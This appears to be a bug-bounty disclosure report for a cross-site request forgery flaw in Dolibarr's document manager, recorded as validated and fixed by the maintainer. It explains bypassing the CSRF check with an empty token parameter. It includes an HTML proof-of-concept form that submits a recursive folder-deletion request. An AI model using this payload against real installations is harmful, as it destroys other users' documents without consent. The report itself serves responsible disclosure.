Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr


Reported on

Jul 18th 2021

✍️ Description

In this directory "" The attacker Can Perform a CSRF attack to Remove any folders.

In this Directory application take a parameter named "token" and I set "token" parameter value to nothings like "token=&action=add....." to Bypass "token" parameter

first open Following "PoC.html" then click on appeared bottom on the page and after that you can notice that the folder with 211 section is removed

🕵️‍♂️ Proof of Concept


  <script>history.pushState('', '', '/')</script>
    <form action="">
      <input type="hidden" name="section" value="211" />
      <input type="hidden" name="module" value="ecm" />
      <input type="hidden" name="backtopage" value="&#47;core&#47;ajax&#47;ajaxdirtree&#46;php&#63;file&#95;manager&#61;1&amp;website&#61;&amp;pageid&#61;" />
      <input type="hidden" name="action" value="confirm&#95;deletedir" />
      <input type="hidden" name="confirm" value="yes" />
      <input type="hidden" name="token" value="" />
      <input type="hidden" name="deletedirrecursive" value="" />
      <input type="submit" value="Submit request" />

💥 Impact

This vulnerability is capable of remove any Folders of any user's Documents

We have contacted a member of the dolibarr team and are waiting to hear back a year ago
Laurent Destailleur validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur marked this as fixed with commit 0e18bd a year ago
Laurent Destailleur has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation